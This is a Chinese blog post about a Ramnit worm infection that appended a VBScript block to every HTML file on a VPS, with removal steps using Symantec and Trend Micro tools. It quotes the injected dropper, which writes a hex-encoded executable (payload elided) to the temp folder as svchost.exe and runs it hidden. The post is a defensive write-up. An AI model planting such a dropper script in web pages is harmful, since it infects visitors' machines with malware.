參考:
https://www.cnblogs.com/wuhairui/p/8297614.html
http://www.guopingblog.com/post/100.html
最近發現vps流量瘋長 看了下統計 也沒看到網站有大流量,查看源碼才發現網頁被添加了一段很長的js 內容大概是這樣
-
<SCRIPT Language=VBScript>
-
-
DropFileName = “svchost.exe”
-
-
WriteData =
-
-
“4D5A0000200000000400000F00FFF.............................................此處省略N個字符串”
-
-
Set FSO = CreateObject("Scripting.FileSystemObject")
-
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
-
If FSO.FileExists(DropPath)=False Then
-
Set FileObj = FSO.CreateTextFile(DropPath, True)
-
For i = 1 To Len(WriteData) Step 2
-
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
-
Next
-
FileObj.Close
-
End If
-
Set WSHshell = CreateObject("WScript.Shell")
-
WSHshell.Run DropPath, 0
-
//--></SCRIPT>
到vps一看才發現 所有的 html 文件末尾都被加了一段這個代碼把頁面體積搞的很大 從而導致流量飆升,百度了一晚上沒搞明白,第二天又搞了一天試過360殺毒根本沒啥用,最后用賽門鐵克的 Ramnit 蠕蟲病毒 專殺工具給搞定了。下面說下解決方案
1、下載 賽門鐵克的 Ramnit 蠕蟲病毒 專殺工具
下載地址:https://www.symantec.com/security_response/writeup.jsp?docid=2015-022415-4725-99
下載后直接運行 點 star 即可 全盤刪完后會提示重啟 點 yes 重啟即可。
2、用專殺工具殺完以后隨機檢查了幾個 html 文件發現還有那段代碼,不過不會像之前自己手動刪了 然后里面就又被自動加上了,這說明病毒已經被殺掉了可能是文件太多,專殺工具沒有全都檢測得到,不過沒關系可以用批量查找替換工具 ultrareplace 把網站重新查找替換一下即可。
ultrareplace 下載地址:http://www.xiazaiba.com/html/4475.html
目前看上去是問題解決了,還需再觀察幾天,盡量不要在服務器下載運行來歷不明的軟件,及時打補丁安裝防護工具。
首先表示強烈譴責,沒事寫出這種木馬來。導致開發者把時間花在解決這種問題上。
這種木馬會在你全盤的html文件的最底部生成一堆vbscript代碼,導致html文件變得很大。大概213kb。可以看出他就是在惡搞。
如圖:
你寫好的html,過段時間就變成這樣了。前端開發表示簡直心態爆炸。
解決方案:
| 1.至以下鏈接處下載ATTK掃描工具: http://support.trendmicro.com.cn ... stomizedpackage.exe (32位) http://support.trendmicro.com.cn ... mizedpackage_64.exe(64位) 2.將下載的工具(supportcustomizedpackage)放到有問題的電腦上,雙擊運行 3.在打開的界面中手動設定掃描全盤文件 |
運行:
全盤掃描:
轉:https://bbs.kafan.cn/thread-1830286-1-1.html